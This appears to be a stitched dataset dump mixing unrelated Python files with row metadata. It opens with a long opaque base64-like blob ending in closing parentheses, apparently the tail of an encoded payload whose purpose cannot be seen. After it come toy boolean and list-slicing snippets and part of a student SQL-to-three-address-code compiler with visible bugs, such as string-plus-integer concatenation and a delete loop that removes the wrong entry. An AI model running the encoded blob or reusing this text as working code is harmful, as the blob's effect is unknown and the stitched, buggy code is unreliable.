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"))) | 30,059 | 60,091 | 0.959114 | 2,339 | 60,118 | 24.651561 | 0.977768 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175394 | 0.000033 | 60,118 | 2 | 60,091 | 30,059 | 0.783751 | 0 | 0 | 0 | 0 | 0.5 | 0.998819 | 0.998819 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
b8e38453845efc8da1a11645a3bedb0fa32b945e | 112 | py | Python | week04/code07.py | byeongal/KMUCP | 5bafe02c40aae67fc53d9e6cdcb727929368587e | [
"MIT"
] | null | null | null | week04/code07.py | byeongal/KMUCP | 5bafe02c40aae67fc53d9e6cdcb727929368587e | [
"MIT"
] | null | null | null | week04/code07.py | byeongal/KMUCP | 5bafe02c40aae67fc53d9e6cdcb727929368587e | [
"MIT"
] | 1 | 2019-11-27T20:28:19.000Z | 2019-11-27T20:28:19.000Z | print(False or False) # False
print(False or True) # True
print(True or False) # True
print(True or True) # True | 28 | 29 | 0.723214 | 20 | 112 | 4.05 | 0.2 | 0.246914 | 0.296296 | 0.37037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.169643 | 112 | 4 | 30 | 28 | 0.870968 | 0.178571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
6202f765b3102973cee3e38b48f509b3a58d982c | 537 | py | Python | week_8/manipulacao_listas.py | angelitabrg/lih_lab_python | d524349331f3f977aec9c05cb26a6948a3f23d4d | [
"MIT"
] | null | null | null | week_8/manipulacao_listas.py | angelitabrg/lih_lab_python | d524349331f3f977aec9c05cb26a6948a3f23d4d | [
"MIT"
] | null | null | null | week_8/manipulacao_listas.py | angelitabrg/lih_lab_python | d524349331f3f977aec9c05cb26a6948a3f23d4d | [
"MIT"
] | null | null | null | # FATIAS DE LISTAS:
primos = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]
primos[1:2]
#[3]
primos[2:7]
#[5, 7, 11, 13, 17]
len(primos)
#25
primos[0:12]
#[2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]
primos[12:25]
#[41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]
primos[:12]
#[2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]
primos[12:]
#[41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]
final = primos[12:]
final
#[41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]
| 15.342857 | 105 | 0.50838 | 121 | 537 | 2.256198 | 0.289256 | 0.029304 | 0.058608 | 0.087912 | 0.747253 | 0.717949 | 0.717949 | 0.717949 | 0.717949 | 0.717949 | 0 | 0.468293 | 0.236499 | 537 | 34 | 106 | 15.794118 | 0.197561 | 0.528864 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
62075dcd3ce7d7c703506424043176e8663426da | 117 | py | Python | Python/Tests/TestData/Grammar/DictComp.py | techkey/PTVS | 8355e67eedd8e915ca49bd38a2f36172696fd903 | [
"Apache-2.0"
] | 695 | 2019-05-06T23:49:37.000Z | 2022-03-30T01:56:00.000Z | Python/Tests/TestData/Grammar/DictComp.py | techkey/PTVS | 8355e67eedd8e915ca49bd38a2f36172696fd903 | [
"Apache-2.0"
] | 1,672 | 2019-05-06T21:09:38.000Z | 2022-03-31T23:16:04.000Z | Python/Tests/TestData/Grammar/DictComp.py | techkey/PTVS | 8355e67eedd8e915ca49bd38a2f36172696fd903 | [
"Apache-2.0"
] | 186 | 2019-05-13T03:17:37.000Z | 2022-03-31T16:24:05.000Z | {fob:oar for fob,oar in baz}
{fob:oar for fob,oar in baz if quox}
{fob:oar for fob,oar in baz for quox in Exception}
| 29.25 | 50 | 0.717949 | 27 | 117 | 3.111111 | 0.296296 | 0.428571 | 0.321429 | 0.428571 | 0.714286 | 0.714286 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0.179487 | 117 | 3 | 51 | 39 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
62407ea1b4a474def9c62fa68ae9667379a0ed49 | 62,646 | py | Python | parser/fase2/team24/procedural.py | Yosoyfr/tytus | 0df7e656835a93458462e476f7ab858a33baa2e0 | [
"MIT"
] | null | null | null | parser/fase2/team24/procedural.py | Yosoyfr/tytus | 0df7e656835a93458462e476f7ab858a33baa2e0 | [
"MIT"
] | null | null | null | parser/fase2/team24/procedural.py | Yosoyfr/tytus | 0df7e656835a93458462e476f7ab858a33baa2e0 | [
"MIT"
] | 4 | 2020-12-19T17:12:13.000Z | 2021-01-07T20:29:53.000Z | import hashlib
from datetime import date
from variables import tabla as ts
from variables import NombreDB
from variables import cont as ncont
import tablaDGA as TAS
import mathtrig as mt
import reportError as errores
#from Interfaz import lista
funciones = []
objopt = []
cont = ncont
class pl():
'Clase abstacta'
def deleteF(name):
name = name +'():'
for i in range(len(funciones)):
x = funciones[i].split(" ")
print( 'tengo que eliminar la posicion '+ str(i) +' ya que elimine '+ str(x[1]))
funciones.pop(i)
break
class declaration(pl):
def __init__(self,id,constant,tipo,collate,notnull,exp):
self.id = id
self.constant = constant
self.tipo = tipo
self.collate = collate
self.notnull = notnull
self.exp = exp
self.traduccion = None
def c3d(self):
if self.traduccion == None:
if self.exp == None:
self.traduccion = 'a'
else:
self.traduccion =self.exp.traducir()
c3d = ''
if self.traduccion == 'a':
valor = 'None'
else:
if isinstance(self.traduccion[2],str):
valor = '\''+str(self.traduccion[2])+'\''
else:
valor = str(self.traduccion[2])
if self.collate == None:
col = 'None'
else:
col = self.collate
if self.tipo == 'SMALLINT':
c3d += '\tambitoFuncion = ts.buscarIDF()\n'
c3d += '\tNuevoSimbolo = TAS.Simbolo(cont,\''+str(self.id)+'\',TAS.TIPO.SMALLINT,ambitoFuncion,None, None, None, None, None, None, None ,None,None,'+valor+', '+col+','+str(self.notnull)+','+str(self.constant)+')\n'
c3d += '\tts.agregar(NuevoSimbolo)\n'
c3d += '\tcont+=1\n'
elif self.tipo == 'INTEGER':
c3d += '\tambitoFuncion = ts.buscarIDF()\n'
c3d += '\tNuevoSimbolo = TAS.Simbolo(cont,\''+str(self.id)+'\',TAS.TIPO.INTEGER,ambitoFuncion,None, None, None, None, None, None, None ,None,None,'+valor+', '+col+','+str(self.notnull)+','+str(self.constant)+')\n'
c3d += '\tts.agregar(NuevoSimbolo)\n'
c3d += '\tcont+=1\n'
elif self.tipo == 'BIGINT':
c3d += '\tambitoFuncion = ts.buscarIDF()\n'
c3d += '\tNuevoSimbolo = TAS.Simbolo(cont,\''+str(self.id)+'\',TAS.TIPO.BIGINT,ambitoFuncion,None, None, None, None, None, None, None ,None,None,'+valor+', '+col+','+str(self.notnull)+','+str(self.constant)+')\n'
c3d += '\tts.agregar(NuevoSimbolo)\n'
c3d += '\tcont+=1\n'
elif self.tipo == 'DECIMAL':
c3d += '\tambitoFuncion = ts.buscarIDF()\n'
c3d += '\tNuevoSimbolo = TAS.Simbolo(cont,\''+str(self.id)+'\',TAS.TIPO.DECIMAL,ambitoFuncion,None, None, None, None, None, None, None ,None,None,'+valor+', '+col+','+str(self.notnull)+','+str(self.constant)+')\n'
c3d += '\tts.agregar(NuevoSimbolo)\n'
c3d += '\tcont+=1\n'
elif self.tipo == 'NUMERIC':
c3d += '\tambitoFuncion = ts.buscarIDF()\n'
c3d += '\tNuevoSimbolo = TAS.Simbolo(cont,\''+str(self.id)+'\',TAS.TIPO.NUMERIC,ambitoFuncion,None, None, None, None, None, None, None ,None,None,'+valor+', '+col+','+str(self.notnull)+','+str(self.constant)+')\n'
c3d += '\ttabla.agregar(NuevoSimbolo)\n'
c3d += '\tcont+=1\n'
elif self.tipo == 'REAL':
c3d += '\tambitoFuncion = ts.buscarIDF()\n'
c3d += '\tNuevoSimbolo = TAS.Simbolo(cont,\''+str(self.id)+'\',TAS.TIPO.REAL,ambitoFuncion,None, None, None, None, None, None, None ,None,None,'+valor+', '+col+','+str(self.notnull)+','+str(self.constant)+')\n'
c3d += '\tts.agregar(NuevoSimbolo)\n'
c3d += '\tcont+=1\n'
elif self.tipo == 'DOUBLE_PRECISION':
c3d += '\tambitoFuncion = ts.buscarIDF()\n'
c3d += '\tNuevoSimbolo = TAS.Simbolo(cont,\''+str(self.id)+'\',TAS.TIPO.DOUBLE_PRECISION,ambitoFuncion,None, None, None, None, None, None, None ,None,None,'+valor+', '+col+','+str(self.notnull)+','+str(self.constant)+')\n'
c3d += '\tts.agregar(NuevoSimbolo)\n'
c3d += '\tcont+=1\n'
elif self.tipo == 'DOUBLE':
c3d += '\tambitoFuncion = ts.buscarIDF()\n'
c3d += '\tNuevoSimbolo = TAS.Simbolo(cont,\''+str(self.id)+'\',TAS.TIPO.DOUBLE,ambitoFuncion,None, None, None, None, None, None, None ,None,None,'+valor+', '+col+','+str(self.notnull)+','+str(self.constant)+')\n'
c3d += '\tts.agregar(NuevoSimbolo)\n'
c3d += '\tcont+=1\n'
elif self.tipo == 'CHARACTER':
c3d += '\tambitoFuncion = ts.buscarIDF()\n'
c3d += '\tNuevoSimbolo = TAS.Simbolo(cont,\''+str(self.id)+'\',TAS.TIPO.CHARACTER,ambitoFuncion,None, None, None, None, None, None, None ,None,None,'+valor+', '+col+','+str(self.notnull)+','+str(self.constant)+')\n'
c3d += '\tts.agregar(NuevoSimbolo)\n'
c3d += '\tcont+=1\n'
elif self.tipo == 'CHARACTER_VARYING':
c3d += '\tambitoFuncion = ts.buscarIDF()\n'
c3d += '\tNuevoSimbolo = TAS.Simbolo(cont,\''+str(self.id)+'\',TAS.TIPO.CHARACTER_VARYING,ambitoFuncion,None, None, None, None, None, None, None ,None,None,'+valor+', '+col+','+str(self.notnull)+','+str(self.constant)+')\n'
c3d += '\tts.agregar(NuevoSimbolo)\n'
c3d += '\tcont+=1\n'
elif self.tipo == 'TEXT':
c3d += '\tambitoFuncion = ts.buscarIDF()\n'
c3d += '\tNuevoSimbolo = TAS.Simbolo(cont,\''+str(self.id)+'\',TAS.TIPO.TEXT,ambitoFuncion,None, None, None, None, None, None, None ,None,None,'+valor+', '+col+','+str(self.notnull)+','+str(self.constant)+')\n'
c3d += '\tts.agregar(NuevoSimbolo)\n'
c3d += '\tcont+=1\n'
elif self.tipo == 'TIMESTAMP':
c3d += '\tambitoFuncion = ts.buscarIDF()\n'
c3d += '\tNuevoSimbolo = TAS.Simbolo(cont,\''+str(self.id)+'\',TAS.TIPO.TIMESTAMP,ambitoFuncion,None, None, None, None, None, None, None ,None,None,'+valor+', '+col+','+str(self.notnull)+','+str(self.constant)+')\n'
c3d += '\tts.agregar(NuevoSimbolo)\n'
c3d += '\tcont+=1\n'
return c3d
def traducir(self):
c3d = ''
if self.traduccion == None:
self.traduccion =self.exp.traducir()
if self.tipo == 'SMALLINT':
if self.exp == None:
c3d += str(self.id)+' = 0'
else:
c3d += self.exp.codigo #codigo que va detras
c3d += str(self.id)+' = '+str(self.traduccion[1]) #variable final o valor en especifico
elif self.tipo == 'INTEGER':
if self.exp == None:
c3d += self.id+' = 0'
else:
c3d += self.exp.traducir[0] #codigo que va detras
c3d += str(self.id)+' = '+str(self.traduccion[1]) #variable final o valor en especifico
elif self.tipo == 'BIGINT':
if self.exp == None:
c3d += self.id+' = 0'
else:
c3d += self.exp.traducir[0] #codigo que va detras
c3d += str(self.id)+' = '+str(self.exp.traduccion[1]) #variable final o valor en especifico
elif self.tipo == 'DECIMAL':
if self.exp == None:
c3d += self.id+' = 0'
else:
c3d += self.exp.traducir[0] #codigo que va detras
c3d += str(self.id)+' = '+str(self.exp.traduccion[1]) #variable final o valor en especifico
elif self.tipo == 'NUMERIC':
if self.exp == None:
c3d += self.id+' = 0'
else:
c3d += self.exp.traducir[0] #codigo que va detras
c3d += str(self.id)+' = '+str(self.exp.traduccion[1]) #variable final o valor en especifico
elif self.tipo == 'REAL':
if self.exp == None:
c3d += self.id+' = 0'
else:
c3d += self.exp.traducir[0] #codigo que va detras
c3d += str(self.id)+' = '+str(self.exp.traduccion[1]) #variable final o valor en especifico
elif self.tipo == 'DOUBLE':
if self.exp == None:
c3d += self.id+' = 0'
else:
c3d += self.exp.traducir[0] #codigo que va detras
c3d += str(self.id)+' = '+str(self.exp.traduccion[1]) #variable final o valor en especifico
elif self.tipo == 'PRECISION':
if self.exp == None:
c3d += self.id+' = 0'
else:
c3d += self.exp.traducir[0] #codigo que va detras
c3d += str(self.id)+' = '+str(self.exp.traduccion[1]) #variable final o valor en especifico
elif self.tipo == 'CHARACTER':
if self.exp == None:
c3d += self.id+' = \'\' '
else:
c3d += self.exp.traducir[0] #codigo que va detras
c3d += str(self.id)+' = '+str(self.exp.traduccion[1]) #variable final o valor en especifico
elif self.tipo == 'CHARACTER_VARYING':
if self.exp == None:
c3d += self.id+' = \'\' '
else:
c3d += self.exp.traducir[0] #codigo que va detras
c3d += str(self.id)+' = '+str(self.traduccion[1]) #variable final o valor en especifico
elif self.tipo == 'TEXT':
if self.exp == None:
c3d += self.id+' = \'\' '
else:
c3d += self.exp.traducir[0] #codigo que va detras
c3d += str(self.id)+' = '+str(self.traduccion[1]) #variable final o valor en especifico
elif self.tipo == 'TIMESTAMP':
if self.exp == None:
c3d += self.id+' = \'\' '
else:
c3d += self.exp.traducir[0] #codigo que va detras
c3d += str(self.id)+' = '+str(self.traduccion[1]) #variable final o valor en especifico
return c3d
def ejecutar(self):
global cont
ambitoFuncion = ts.buscarIDF()
#ambitoFuncion = ts.buscarIDF()
if self.traduccion == None:
if self.exp == None:
self.traduccion = 'a'
else:
self.traduccion =self.exp.traducir()
if self.traduccion == 'a':
valor = 'None'
else:
valor = str(self.traduccion[2])
if self.tipo.upper() == 'SMALLINT':
if valor == 'None':
valor = 0
NuevoSimbolo = TAS.Simbolo(cont,self.id,TAS.TIPO.SMALLINT,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor, self.collate,self.notnull)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'INTEGER':
if valor == 'None':
valor = 0
NuevoSimbolo = TAS.Simbolo(cont,self.id,TAS.TIPO.INTEGER,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor, self.collate,self.notnull)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'BIGINT':
if valor == 'None':
valor = 0
NuevoSimbolo = TAS.Simbolo(cont,self.id,TAS.TIPO.BIGINT,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor, self.collate,self.notnull)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'DECIMAL':
if valor == 'None':
valor = 0.0
NuevoSimbolo = TAS.Simbolo(cont,self.id,TAS.TIPO.DECIMAL,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor, self.collate,self.notnull)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'NUMERIC':
if valor == 'None':
valor = 0.0
NuevoSimbolo = TAS.Simbolo(cont,self.id,TAS.TIPO.NUMERIC,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor, self.collate,self.notnull)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'REAL':
if valor == 'None':
valor = 0.0
NuevoSimbolo = TAS.Simbolo(cont,self.id,TAS.TIPO.REAL,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor, self.collate,self.notnull)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'DOUBLE':
if valor == 'None':
valor = 0.0
NuevoSimbolo = TAS.Simbolo(cont,self.id,TAS.TIPO.DOUBLE,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor, self.collate,self.notnull)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'PRECISION':
if valor == 'None':
valor = 0.0
NuevoSimbolo = TAS.Simbolo(cont,self.id,TAS.TIPO.PRECISION,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor, self.collate,self.notnull)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'CHARACTER':
if valor == 'None':
valor = ''
NuevoSimbolo = TAS.Simbolo(cont,self.id,TAS.TIPO.CHARACTER,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor, self.collate,self.notnull)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'CHARACTER_VARYING':
if valor == 'None':
valor = ''
NuevoSimbolo = TAS.Simbolo(cont,self.id,TAS.TIPO.CHARACTER_VARING,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor, self.collate,self.notnull)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'TEXT':
if valor == 'None':
valor = ''
NuevoSimbolo = TAS.Simbolo(cont,self.id,TAS.TIPO.TEXT,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor, self.collate,self.notnull)
ts.agregar(NuevoSimbolo)
cont += 1
elif self.tipo.upper() == 'TIMESTAMP':
if valor == 'None':
valor = ''
NuevoSimbolo = TAS.Simbolo(cont,self.id,TAS.TIPO.TIMESTAMP,ambitoFuncion,None, None, None, None, None, None, None ,None,None,valor, self.collate,self.notnull)
ts.agregar(NuevoSimbolo)
cont += 1
class expre(pl):
def __init__(self,tipo, exp):
self.tipo = tipo
self.exp = exp
def traducir(self):
return self.exp.traducir()
def ejecutar(self):
pass
class llamadaP(pl):
def __init__(self,id,lparams) -> None:
self.id = id
self.lparams = lparams
def traducir(self):
if not ts.existeF(str(self.id)):
print('Funcion '+str(self.id) +' no existe')
e = errores.CError(0,0,"Error en llamada de proceso, no existe",'Semantico')
errores.insert_error(e)
return '\tprint( \'Funcion '+ str(self.id) + ' no existe\')\n'
c3d = ''
contadorP = 0
for expresion in self.lparams:
trad = expresion.traducir()
c3d += trad[0] +'\n'
c3d += 'pila['+contadorP+'] = '+trad[1]
contadorP +=1
c3d += '\t'+self.id+'()\n'
return c3d
def c3d(self):
return '\n'
def ejecutar(self):
pass
class llamadaF(pl):
def __init__(self,id,lparams) -> None:
self.id = id
self.lparams = lparams
